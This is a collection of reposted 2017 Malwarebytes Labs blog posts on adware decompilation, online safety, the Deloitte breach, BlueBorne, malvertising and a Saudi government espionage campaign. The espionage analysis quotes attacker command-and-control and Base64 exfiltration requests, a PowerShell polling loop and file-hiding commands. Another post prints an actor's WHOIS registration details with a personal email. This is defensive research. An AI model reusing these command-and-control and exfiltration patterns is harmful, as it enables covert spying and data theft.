Oct 5, 2017
Comments Off on Using ILSpy to analyze a small adware file

Using ILSpy to analyze a small adware file

My curiosity was triggered when the telemetry of our heuristic scanner started showing a multitude of reports about a small file called grandfather.exe, so I went out to grab a copy and have a look at it.

As you can probably tell from some of the detection names at Virustotal, this is a MSIL (Microsoft Intermediate Language) file. There are a lot of tools to decompile MSIL executables, but ILSpy is my personal favorite. To demonstrate why, I will show you how I analyzed this very small executable that is part of the Adware.Dotdo family.

Using ILSpy

Once you have downloaded and unzipped the binaries from their site, you can run ILSpy.exe and click File > Open to navigate to the file that you like to look at.

One advantage of ILSpy is that the code is shown in a very clear format. Even knowing how to read pseudocode and where to find .NET documentation will get you a long way, as I’m about to demonstrate.

The code in the example

c# code

Code is shown in C# format

In this code slice, where the most important part of the program is initialized, we see three methods of hiding the program parts from the user:

  • The program will not be shown in the taskbar
  • The opacity is set at 0% which means you will see right through it
  • And the program will not show any error prompts in case any script errors occur

By the way, if you are more comfortable with coding or reading code in VB.net, you can set ILSpy to show the code in that format.

obfuscated VB code

Code is shown in VB format
(click to enlarge)

The strings in the code above have been obfuscated in a very simple way. Just enough to throw someone who is merely looking at strings off track.

After applyingReplace("28851129", string.Empty)), which is added to all the strings in that part of the code, this is what’s left of the two functions that will later be used as event handlers:


Private Sub ie(sender As Object, e As EventArgs)

Me.i.AllowNavigation = True


End Sub


The event handler above simply navigates to the obfuscated URL.


Private Sub i(sender As Object, e As WebBrowserDocumentCompletedEventArgs)

If Me.i.Document.Title <> "searchbox"  Then


End If

End Sub


This event handler determines where the browser connects to, based on the title of the current document. If the title of the site does not match “searchbox” then it simply redirects the user to the URL that is obfuscated. If the title already is “searchbox” it will do nothing.

VB code

This is where the browser control (‘this’) is initialized while the layout of the main Window (‘base’) is postponed until the browser is ready to go. All the control’s edges are docked to the edges of its containing control and sized appropriately. The browser will resize to fit all of the empty space in its parent container with the DockStyle.Fill property set.

Then the location, size, and name are set, but also the control is hidden by setting the “.visible” property to “false”.

When the new document is fully loaded, the DocumentCompleted event occurs, and the event handler is the (lightly) obfuscated function we discussed earlier, so that will be triggered.

The AutoScaleDimensions property represents the DPI or font setting of the screen that the control was scaled to or designed for. Specifically, at design time this property will be set by the Windows Forms designer to the value your monitor is currently using. The “Font” is auto-scaled as well, relative to the dimensions of the font the classes are using, which is typically the system font.

Then after the browser control has been added to the base application, the first event handler is called which, as mentioned earlier, hides the main window and initializes the browser.


The “program” stays completely hidden from the user, but tries to contact two different websites on the same domain, probably with the intention to fetch further instructions. At the moment of writing, the site contains two iframes connecting to videojelly[.]com and whos.amung[.]us, a visitors counter.

I tried to show why I like ILSpy as a tool to decompile .NET and browse the assembly.

The file we looked at has:

SHA-256              53ac5aa31468ad9c14b179b8fd9ab2eed19cbbf2f5f4de97c9255be6f2af6240

Grandfather.exe is now detected as Adware.Dotdo.



Pieter Arntz

The post Using ILSpy to analyze a small adware file appeared first on Malwarebytes Labs.

Powered by WPeMatico

Oct 2, 2017
Comments Off on National cybersecurity awareness month: simple steps for online safety

National cybersecurity awareness month: simple steps for online safety

With each new devastating breach of security—Equifax, Deloitte, and Sonic, to name a few recent cyber fails—the need for increased cybersecurity awareness has never been more apparent. It’s a good thing, then, that this month is National Cybersecurity Awareness Month (NCSAM).

Observed every October since 2004, NCSAM was created by the Department of Homeland Security and the National Cyber Security Alliance to ensure that every American has the resources they need to stay safer and more secure online. According to the Department of Homeland Security, NCSAM was designed to “engage and educate public and private sector partners through events and initiatives to raise awareness about the importance of cybersecurity, provide them with tools and resources needed to stay safe online, and increase the resiliency of the nation in the event of a cyber incident.”

NCSAM is broken down into weekly themes, including online safety for consumers, securing business networks, looking ahead to the security of future technologies, careers in cybersecurity, and securing infrastructure.

And now Malwarebytes is doing its part. Each week on Labs, we’ll focus on a theme and provide helpful articles, useful tips, and valuable analysis so that you can increase awareness and spread the word. This week’s theme: simple steps to online safety.

Week 1 of NCSAM features the STOP. THINK. CONNECT. campaign, which provides easy, actionable advice for safe surfing. STOP: make sure security measures are in place. THINK: about the consequences of your actions and behaviors online. CONNECT: and enjoy the Internet.

Sounds pretty simple, right? But what exactly does it mean? Here’s our interpretation.

Make sure security measures are in place

It’s often mind-numbing to think about all the things you should and shouldn’t be doing online. Here’s where you use technology to do the heavy lifting. Make sure you’ve got the following equipped on your home computer:

  • Firewall
  • Cybersecurity program that includes technology to block malware, ransomware, adware, and other advanced threats
  • Password manager
  • Wifi secured with password (for mobile devices/streaming)

To learn more about how to proactively protect against various forms of cybercrime, take a look at a few of our articles:

How to beat ransomware: prevent, don’t react

10 easy ways to prevent malware infection

Top 10 ways to secure your mobile phone

Why you don’t need 27 different passwords

With these in place, you can keep out a good chunk of the bad stuff, even if you “misbehave” online. However, human error still accounts for a lot of infections. So that’s why the next step is important.

Think about the consequences of your actions and behaviors online

Sure, you may have layers upon layers of security in place, and that’s going to help. But if you invite a criminal into your home, you’ve pretty much negated any security system you might have deployed. And that’s what happens when you ignore basic online hygiene.

To refresh your memory, there are a few things you need to keep an eye out for/be skeptical of:

  • Tech support scams (Microsoft won’t call you)
  • Phishing emails (is this really your bank asking you to update personal info?)
  • IRS phone calls/texts/emails (they mail you letters)
  • Online shopping on unsecured sites (look for the lock next to the URL)

We could go on, of course, but this general advice is good for all actions online: Does it seem too good to be true? If so, it probably is. Always treat information you encounter with a good sense of skepticism. And for more detailed advice, you can check out these Labs articles:

Tech support scams help and resource page

Something’s phishy: How to detect phishing attempts

Hacking your head: How cybercriminals use social engineering

Connect and enjoy the Internet

If you’re securing your home computer with the proper technologies and making cybersecurity awareness a priority (and if you’ve read this far, that means you are), then you can safely connect to the Internet and enjoy all the cat videos you want to your heart’s content. Sadly, there’s no such thing as being 100 percent secure—online or in life—but you can breathe easier knowing you’re doing the right things and acting responsibly.

Now onward! Go forth, spread the word, and stay tuned for NSCAM’s Week 2 theme: cybersecurity in the workplace is everyone’s business.

Happy surfing!

The post National cybersecurity awareness month: simple steps for online safety appeared first on Malwarebytes Labs.

Powered by WPeMatico

Oct 2, 2017
Comments Off on A week in security (September 25 – October 01)

A week in security (September 25 – October 01)

Recently, we talked about the hacking incident at Deloitte, one of the ‘big four’ global accounting firms. It was reported that client email addresses, usernames, and passwords were exposed. This also brought to light weaknesses in their policies and lack of threat intelligence to recover leaked data. We advised Deloitte clients the following: do an inventory of email addresses used to correspond with the company, review network outbound traffic, determine what possible information might have leaked from the hack, and (more importantly) maintain security best practices to avoid repeating hacks like this from happening.

Patrick Wardle, an acclaimed security researcher, found a keychain vulnerability flaw in High Sierra, Apple’s new macOS operating system. This revelation, unfortunately, spurned a lot of articles that one may deem bordering FUD (fear, uncertainty, doubt). So our resident Mac expert, Thomas Reed, set some records straight.

Senior Malware Analyst Nathan Collier likened BlueBorne, the new attack vector using Bluetooth technology, to influenza. First discovered by Armis Labs, BlueBorne can potentially affect billions of devices across multiple platforms. In the piece, Collier stressed the importance of Bluetooth security and agreed with Armis’s prediction that Bluetooth vulnerabilities would continue to be seen in the future.

Lastly, Lead Malware Intelligence Analyst Jérôme Segura discussed some discoveries last week about cryptocoin mining, malvertising, tech support scam, and targeted attacks.

Segura revealed a questionable trend on the rise where website publishers would mine for cryptocurrencies from user machines while on their sites. He also pictured a scenario where mining is also tied with malvertising. Scammers abused Taboola, a global discovery platform, to redirect users from a promoted story to a tech support scam page.

Segura, together with David Sánchez, wrote about an espionage attack against the Saudi Arabia government in an effort let readers understand how the malware entered their target systems and kept in touch with its C&C.

Below are notable news stories and security-related happenings from last week:

Latest updates for Consumers

  • Responsible Vulnerability Disclosure Is Becoming An International Norm. “More and more countries are joining the United States in adopting a policy of weighing the pros and cons of responsible vulnerability disclosure, as the public calls for more clarity regarding intelligence agencies and their supposed hoarding of previously undiscovered software flaws” (Source: Cyberscoop)
  • Mobile Stock Trading App Providers Unresponsive to Glaring Vulnerabilities. “Researchers from IOActive today published a report describing the scope of the security issues. More concerning, however, is the lack of response from the respective financial firms. Of the 21 apps in question, researcher Alejandro Hernandez said he sent detailed private disclosures to 13 brokerage firms and only two had acknowledged the reports as of Monday.” (Source: Threatpost)
  • XPCTRA Malware Steals Banking And Digital Wallet User’s Credentials. “The malspams used in the campaign try to induce the victim to open a supposed bank bill link. It actually leads to the download of the XPCTRA dropper, that is, the part of the malware responsible for environment recognition and downloading new components. Once executed, it initiates a connection with an Internet address to download other malware parts responsible for later malicious actions.” (Source: SANS Internet Storm Center)
  • Android Unlock Patterns Are A Boon For Shoulder Surfing Attackers. “The ‘swiping’ unlock patterns typical for Android devices are considerably easier for attackers to discern than PIN combinations. In fact, after only one observation of a user entering the pattern, 64% of shoulder surfing attackers will be able to reproduce it, a group of researchers from the US Naval Academy and the University of Maryland Baltimore County has found.” (Source: Help Net Security)
  • Police: Buying Fake Goods Online Can Lead to ID Theft. “The City of London Police has shut down 28,000 websites selling counterfeit goods over the past three years, many of which were registered with stolen identities, it has revealed. Over 4000 sites were created using the identities of unsuspecting members of the public, according to the force, which released the figures as part of a new awareness campaign.” (Source: Infosecurity Magazine)
  • No, Facebook Spies Aren’t Secretly ‘Following Me’, It’s A Hoax. “According to the nonsense debunkers over at Snopes, the hoax debuted in January 2017.” (Source: Sophos’s Naked Security Blog)
  • Sudden Rise Detected in Faceliker Malware That Manipulates Facebook ‘Likes’. “The Faceliker malware is not new, being spotted years back, and is a generic detection that describes malware that takes over users’ browsers and uses JavaScript code to perform click-jacking, giving Facebook “likes” to content received from a central command and control server.” (Source: Bleeping Computer)
  • Duo Security Discovers Apple Mac Computers Unprotected from Malicious Firmware Vulnerabilities. “The report shows Mac users who have updated to the latest operating system (OS) or downloaded the most recent security update may not be as secure as they originally thought. A Duo Labs analysis of over 73,000 real-world Mac systems gathered from users across industries found the Extensible Firmware Interface (EFI) in many popular Mac models was not actually receiving the security updates users thought. This left users susceptible to previously disclosed vulnerabilities such as Thunderstrike 2 and the recent WikiLeaks Vault 7 data dumps that detail attacks against firmware.” (Source: Duo Security)
  • Uber London Ban Sees Rise In Malicious Taxi Apps. “Security researchers have warned of a rise in malicious apps masquerading as legitimate taxi-hailing services, as cyber-criminals look to capitalize on Transport for London (TfL)’s recent decision to ban Uber.” (Source: Infosecurity Magazine)

Latest updates for Businesses

  • Criminal Hacking: Top Technology Risk To Health, Safety And Prosperity. “Americans believe criminal hacking into computer systems is now a top risk to their health, safety and prosperity. Criminal hacking, a new ESET survey finds, outranks other significant hazards, including climate change, nuclear power, hazardous waste, and government surveillance.” (Source: Help Net Security)
  • Three Out Of Four DDoS Attacks Target Multiple Vectors. “Three out of every four DDoS attacks employed blended, multi-vector approaches in the second quarter of 2017, according to Nexusguard. The quarterly report, which measured more than 8,300 attacks, demonstrated that hackers continued to rely on volumetric attacks to overwhelm system resources.” (Source: Help Net Security)
  • Why Your Business Must Care About Privacy. “The current conversation often pits privacy against security, both in consumer and enterprise settings. This is especially true in the debate over whether mobile encryption is essential for the average user. However, not wanting to have personal information shared, acted on, or used by anyone without permission should be seen as a universal right.” (Source: Dark Reading)
  • Shocker? Companies Still Unprepared To Deal With Ransomware. “Companies and government agencies are overwhelmed by frequent, severe ransomware attacks, which have now become the #1 cyber threat to organizations, according to Crowd Research Partners.” (Source: Help Net Security)
  • Healthcare Sector Reports Greatest Number Of Security Incidents. “McAfee Labs saw healthcare surpass public sector to report the greatest number of security incidents in Q2, while the Faceliker Trojan helped drive quarter’s 67% increase in new malware samples from the social media landscape.” (Source: Help Net Security)

Safe surfing, everyone!


The Malwarebytes Labs Team

The post A week in security (September 25 – October 01) appeared first on Malwarebytes Labs.

Powered by WPeMatico

Oct 1, 2017
Comments Off on IP Expo 2017: Garry Kasparov to address delegates on the future of man-machine interaction

IP Expo 2017: Garry Kasparov to address delegates on the future of man-machine interaction

Keynote Speech: 15:40 – 16:10 BST
Location: IP Expo Europe, Main Keynote Stage

Powered by WPeMatico

Oct 1, 2017
Comments Off on Reviving the Rational Middle

Reviving the Rational Middle

In my previous blog posts, I have often argued that the internet brings latent conflicts to the fore, whether we are discussing fake news, government surveillance, nation-state cybersecurity or hate speech. Now, I’d like to make the case that it also works the other way, as we witness the opposite happen such as in  Charlottesville, where white supremacist groups marched with lit torches. Tensions that have long been simmering online have now moved into the realm of face-to-face interaction, where they have exploded with fresh force. Difficult chapters of America’s history have resurfaced; viewpoints we would like to think have been eradicated are still very much alive. The episodes in Charlottesville were painful to watch, absolutely, but perhaps it is better to have these elements of society exposed. If they remain outside of the public’s awareness, we can continue to collectively deny their existence. If they are brought to the surface, we must confront them and react, hopefully in a way that aligns with our guiding principles.

Powered by WPeMatico

Oct 1, 2017
Comments Off on Securing the Total Network: Data, Devices, and People

Securing the Total Network: Data, Devices, and People

If you’re in the business of securing networks for small and medium-sized businesses (SMBs), there is a volume of new challenges you’re most likely tackling. Cybercrime such as ransomware is more pervasive than ever before, with employee error contributing to the risks. The growing amount of connected devices in the workplace has only added to the number of endpoints that need to be managed, and this is made all the more challenging by an industry shortage of cyberskills.

Powered by WPeMatico

Sep 29, 2017
Comments Off on BlueBorne – Bluetooth’s airborne influenza

BlueBorne – Bluetooth’s airborne influenza

Armis Labs has discovered a new attack vector that targets any device that has Bluetooth capability. This includes mobile, desktop, and IoT — roughly accounting for 8.2 billion devices. All operating systems are susceptible — Android, iOS, Windows, and Linux. Dubbed BlueBorne, it exposes several vulnerabilities in the Bluetooth technology. These vulnerabilities open up the potential to perform an array of malicious attacks. Some of which, stated by Armis, are as follows:

  • Take control of devices
  • Access corporate data and networks
  • Break into secure networks that use air gap security measures
  • Spreading malware thatise in range of device with infection

BlueBorne does not require Bluetooth devices to be paired to other devices to be exploited. Even worse, devices are susceptible even when Bluetooth is in non-discoverable mode.

The ease of exploitation

What exactly does it take to exploit these new-found Bluetooth vulnerabilities? As noted in the Armis Labs BlueBorne whitepaper, the first step to is to steal the BD_ADDR (Bluetooth Device address). This is a hardcoded 48 bit MAC address of the Bluetooth device. Stealing the BD_ADDR the Bluetooth device, especially when it is set to non-discoverable, used to be considered a feat.  With the introduction of new Bluetooth “sniffing” hardware, this has become a lot easier. One such device is the open source hardware Ubertooth which plugs into a USB port of a computer.  Simply be within range with the Ubertooth plugged in, and it will grab any Bluetooth traffic from the air. With the help of some other monitoring tools to analyze the traffic — voilà — you have BD_ADDRs.

Spreading malware via Bluetooth

One of the more intriguing attacks is the potential to propagate malware using BlueBorne vulnerabilities. More specifically, through mobile devices.

The only way I could hypothesize this happening is through an attack using a list of collected BD_ADDRs and then creating a malicious app which scans for those addresses. Any device within range on the list becomes a target. Using the BlueBorne vulnerabilities to propagate itself, the malicious app transfers to the target device. Keep in mind the user of the target device would need to accept installing the malicious app as well.

All this isn’t impossible, but unlikely with the limitation of requiring a list of BD_ADDRs. Now if a mobile device could steal BD_ADDRs for itself — which it can’t at this point — then we should start worrying.

So how bad is it?

The work done by Armis Labs to present the BlueBorne vulnerabilities is extremely valuable to the security industry. It highlights the need for improved Bluetooth security. I applaud them for their hard work in this endeavor.

The introduction of sniffing hardware like Ubertooth and the creation of other open-source tools to analyze the collected traffic like Kismet have taken down the toughest barrier for hackers — collecting the BD_ADDR. With this exposure, I agree with Armis Labs predication — we will continue to see more Bluetooth vulnerabilities arise.

The requirement of having to be within Bluetooth range creates a limitation to BlueBorne. I believe this limitation will isolate it to more targeted attacks — most likely against specific companies.  In this case scenario, a spear phishing attack would be much easier to carry out and wouldn’t require being physically within Bluetooth range. Therefore, I’m skeptical that we will see BlueBorne implemented in a real-world attack.

Disabling Bluetooth

Bluetooth, by default, is enabled. If you don’t use Bluetooth i.e. you don’t have any devices paired, it’s best to disable it. If you do use your Bluetooth, disabling it when not in use is the most secure option against BlueBorne. However, many use their mobile devices to pair with their vehicle’s handsfree unit. Ideally, remembering to enable/disable Bluetooth depending on whether you’re driving or not is the best option. Not as ideal and more likely, you will forget to enable Bluetooth before starting to drive — myself included. Therefore, you have to weigh what is more of a threat. A BlueBorne attack or looking at your phone to enable Bluetooth WHILE driving? Just something to think about.

The post BlueBorne – Bluetooth’s airborne influenza appeared first on Malwarebytes Labs.

Powered by WPeMatico

Sep 28, 2017
Comments Off on Deloitte breached by hackers for months

Deloitte breached by hackers for months

On September 25, 2017, Deloitte announced that they detected a breach of the firm’s global email server via a poorly secured admin email in March of this year. Further, the attackers most likely had control of the server since November of 2016. Deloitte’s initial statement indicated that only six of their consultancy clients were impacted by the breach, but insider sources later disclosed to the media that the attack most likely compromised every admin account at the firm. The startling severity of the breach has brought attention to Deloitte’s other cybersecurity practices, which, as we can see here with a likely Active Directory server, are not ideal. (There are valid applications for self-signed certificates, but the larger problem here is that the server is exposed to the outside internet at all, running unnecessary services.)

An admin account subversion is not very shocking, given that a significant number of Deloitte email accounts can be found on paste sites, most of a low complexity suggesting the firm has minimal password policies, and lack of a threat intelligence capacity to identify and recover leaked PII. A quick scan of pastebin.com showed a significant amount of Deloitte data from various locations, going back five years. A portion of those pastes were email credentials – the primary breach vector – as shown below.

What you should do if you’re a Deloitte cybersecurity client

  • First and foremost, take a quick inventory of your own corporate email accounts that have corresponded with the company. Accounts with normal network privileges could benefit from a password reset. Those with elevated privileges should be reviewed for accesses and unusual activity. It’s not unheard of for attackers to breach an ancillary services firm in furtherance of an attack on the main target.
  • Do Deloitte consultants have accounts on your network? You can review outbound traffic on these hosts to make sure it matches with their work role.
  • Maintain your own threat intelligence capacity to identify work product that might be leaked on paste sites. Enormous breaches like this one are quickly monetized on the dark web, with data eventually filtering out for public use. You can’t prevent third party access to your data, but you can find it in a timely manner, and serve a takedown request accordingly.
  • Don’t repeat their mistakes. Best practices for enterprise security are widely written about and publically available. While security is generally seen as a cost center, it would be more accurate to describe it as an investment in public trust. And without trust, how profitable could your enterprise possibly be?


Third-party breaches are occurring at an accelerating rate. While outsourcing data security to a popular vendor checks off the “security box,” there is no good substitution for in-house expertise that knows the business as well as security. Good security now is an investment in stable capital growth later. Building in-house talent to facilitate that growth can put you ahead of the curve before the next breach happens.

The post Deloitte breached by hackers for months appeared first on Malwarebytes Labs.

Powered by WPeMatico

Sep 28, 2017
Comments Off on Tech support scammers abuse native ad and content provider Taboola to serve malvertising

Tech support scammers abuse native ad and content provider Taboola to serve malvertising

A large number of publishers – big and small – are monetizing their sites by selling space for companies that provide so-called native advertising, cited as more effective and engaging than traditional banner ads.

Indeed, on a news or entertainment site, users are more inclined to click on links and articles thinking that they are one and the same, not realizing that those are actually ‘sponsored’ and tied to various third-party providers.

Rogue advertisers have realized this unique opportunity to redirect genuine traffic towards their own infrastructure where they can subject their audience to whatever content they wish.

Case in point, we caught this malvertising incident on MSN.com, the Microsoft web portal that attracts millions of unique visitors. While clicking on a story promoted by Taboola – a leading global discovery platform which Microsoft signed a deal within 2016 – we were redirected to a tech support scam page. The warning claims that our computer has crashed and that we must call a number for immediate assistance.

Figure 1: Automatic redirection from click on promoted story to scam page

The fraudulent page cannot be closed normally because it uses code that repeats the warning indefinitely. Unfortunately, this is enough to scare many folks and trick them into calling what they think is Microsoft support. Instead, they will be dealing with fake technicians whose goal is to extort hundreds of dollars from them.

Decoy news page hides real intentions

Rogue actors typically start creating content just like any other advertiser would and build up a profile. After all, they want to appear genuine in order to game the system with ‘hot’ content.

What’s determined as hot can be derived from real or shocking news. The point is to do a little bit of market study on what the most searched for stories or keywords are in order to attract traffic.

In this malvertising example, if we review the sequence of events, we realize that the scammer created a bogus news site (infinitymedia[.]online) which does have actual content but is performing conditional redirects, also known as ‘cloaking’.

Figure 2: Traffic view showing temporary hop via decoy news site

A conditional redirect is usually a server-side mechanism that profiles the user and returns a particular response. For instance, if the server determines that a bot or crawler is making a request, it may in turn either deny it or simply serve the expected content (decoy). Similarly, if the user is running Internet Explorer, is from North America and their IP address appears to have hit the server for the first time, they may receive a scammy page instead.

The point is that it’s trivial to play a Dr. Jekyll and Mr. Hyde kind of game and serve the content you want. The fraudulent advertiser did create various pages with impactful keywords (potentially for Search Engine Optimization purposes) and can also use those stories as a decoy:

Figure 3: Stories designed for click-bait

To get back to this malvertising incident on MSN, the user was conditionally redirected to another site (the tech support scam page), and never saw the content they were looking for.

Figure 4: The 302 redirect call from the fake news site to the scam page

To show that this was no mere ‘coincidence’, we can look at the ownership of the ‘news’ site (infinitymedia[.]online) and see how it links to the tech support domain name (4vxadfcjdgbcmn[.]ga). A WHOIS lookup for infinitymedia[.]online returns the following information:

Creation Date: 2017-05-23T05:14:50.0Z
Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
Registrant Name: bhanu
Registrant Country: IN
Registrant Email: bhanutomar90nk@gmail.com

A cursory review using RiskIQ’s PassiveTotal of recently created domains using the same email address shows a tendency for this actor to register tech support scams domains:

Figure 5: Domains recently registered by the actor behind the decoys news sites

Still, we don’t have a clear connection to 4vxadfcjdgbcmn[.]ga which does not have an identifiable registrant. Indeed, the .GA Top Level Domain (TLD) is comprised of free domain names and their registrant is… Gabon TLD B.V.

However, this particular actor made the mistake of reusing the same host server for domains he had created before. For example, if we take micro-soft-system-alert2[.]online which is registered to his email address, we notice that it resolves to, a server full of tech support scams and phishing sites, including the one used in this particular malvertising attack, namely 4vxadfcjdgbcmn[.]ga.

Figure 7: Connecting the fake news sites to the tech support domain

Further inspection of other properties tied to bhanutomar90nk@gmail.com shows similar bogus ‘news’ sites:


There is no doubt that this actor has very clear intentions and has turned high-profile stories into a click-bait lead generation tool for tech support scams.

Banner ads versus native advertising

Banner ads can load third-party tags that are laced with malicious content, not to mention promoting anything that is outrageous (regardless of whether it has anything to do with the current content) and is bound to get clicks. For instance, there have been many documented instances of fake celebrity deaths used for click bait purposes on Facebook.

But promoted stories aren’t necessarily that different (or safer) when they take the user to a third-party website that is in the complete control of an advertiser, good or bad.

Users should be aware that even on a trusted platform, they should watch what they click on and be careful of sensationalist stories that may be used as click bait.

We reported the fraudulent advertiser to Taboola which told us they had opened an internal review of this particular vendor. We reached back with more questions regarding how Taboola deals with click bait and fake news, whether they scan articles for malware or scams, and finally if they had a direct point of contact to report security-related issues. However, we only received a response for the fake news problem, which you can read more about here.

The post Tech support scammers abuse native ad and content provider Taboola to serve malvertising appeared first on Malwarebytes Labs.

Powered by WPeMatico

Sep 28, 2017
Comments Off on Elaborate scripting-fu used in espionage attack against Saudi Arabia Government entity

Elaborate scripting-fu used in espionage attack against Saudi Arabia Government entity

This post was co-authored by David Sánchez and Jérôme Segura

We recently came across a campaign targeting a Saudi Arabia Government entity via a malicious Word document which at first reminded us of an attack we had previously described on this blog.

In our previous research, we detailed how an information stealer Trojan was deployed via a Word macro, in order to spy on its victims (various parts of the Saudi Government). The stolen information was transmitted back to the threat actors’ infrastructure in an encrypted format.

This new threat also uses a macro to infect the target’s computer, but rather than retrieving a binary payload, it relies on various scripts to maintain its presence and to communicate via hacked websites, acting as proxies for the command and control server.

The malicious script fingerprints the victim’s machine and can receive any command that will run via PowerShell. In this blog post, we will describe the way this threat enters the system and maintains its presence while constantly communicating with its command and control server.

Covert delivery and persistence

The decoy document bears the logo of one of the branches of the Saudi Government and prompts the user to “Enable Content” stating that the document is in protected view (which is actually true).

A high-level summary static analysis of this document reveals that it includes a macro as well as several Base64 encoded strings.

OLE:MAS--B-- target.doc
(Flags: M=Macros, A=Auto-executable, S=Suspicious keywords, B=Base64 strings)

One of the first routines the malicious VBScript performs is to disable or lower security settings within Microsoft Excel and Word by altering corresponding registry keys with values of “1”, meaning: Enable All (ref).

The VBScript also fingerprints the victim for their IP address by querying the Win32_NetworkAdapterConfiguration class:

It then proceeds to retrieve a stream of data from the Pastebin website using its own proxy:

The data is converted into two scripts, a PowerShell and a Visual Basic one, the latter being used for persistence on the infected machine via two different hook points: a Run key in the registry and a scheduled task.

This VBScript is really a launcher for the more important PowerShell script, and both are stored as hidden system files under the Documents folder using the following commands:

attrib +s +h "C:UserspublicdocumentsNTSTATS.ps1"
attrib +s +h "C:UserspublicdocumentsNTSTATS.vbs"

Espionage and exfiltration

That PowerShell script also has the same instructions to lower Office’s security settings but more importantly is used to exfiltrate data and communicate with the command and control server.

A unique ID is stored on the victim’s machine (in the same folder as the scripts) in a file called [username].key and is used to receive instructions via a server located in Germany (although it appears to be down at the time of writing).

GET http://144.76.109[.]88/al/?action=getCommand&id=[user ID] HTTP/1.1

A function called getKey retrieves the unique ID from the .key file stored on the local hard drive to register the machine as a new victim. If the key file does not exist, it queries for additional system information (computer name, IP address, OS version) and then creates that key (Set-Content $keypath $id).

Another function called getCommand uses the key as a parameter to then contact the C2. This command runs every 5 minutes:

while ($true){
 getCommand $key
 start-sleep -Seconds 300

The malicious script can receive and run any command the attackers want via PowerShell, making this a very powerful attack.

The eventual exfiltration of data is done via several hardcoded websites acting as a proxy via the sendResult function:

The transmission of data is done via Base64 encoded strings, one for the user id (.key file) and one for the exfiltrated data.

GET /wp-content/wp_fast_cache/wmg-global.com/Senditem.php?c=[removed]== HTTP/1.1
Host: www.wmg-global.com
Connection: Keep-Alive

The parameters passed on the URL in the Base64 format:


Decoding the value in the variable “res”, we get the following info.

Connection-specific DNS Suffix . : [removed]
Description . . . . . . . . . . . : [removed]
Physical Address. . . . . . . . . : [removed]
DHCP Enabled. . . . . . . . . . . : [removed]
Autoconfiguration Enabled . . . . : [removed]

Script based attack and protection

This attack is very different from the typical malicious spam we see on a daily basis, blasting Locky or some banking Trojan. Indeed, there is no malicious binary payload (although one could be downloaded by the C2) which makes us think the attackers are trying to keep a low profile and remain on the system while collecting information from their target.

Relying on scripts as part of the attack chain and ongoing infection is an interesting concept due to how modular it is, not to mention more likely to stay undetected from antivirus engines. At the same time, it needs to rely on various encoding techniques because it can’t make use of a packer like a traditional malware binary would. 

Malwarebytes users are already protected against this attack thanks to our signature-less engine.

Indicators of compromise







The post Elaborate scripting-fu used in espionage attack against Saudi Arabia Government entity appeared first on Malwarebytes Labs.

Powered by WPeMatico


Location and hours

Txt/Email or CALL NOW to discuss your recovery plan.
Computer repair association logo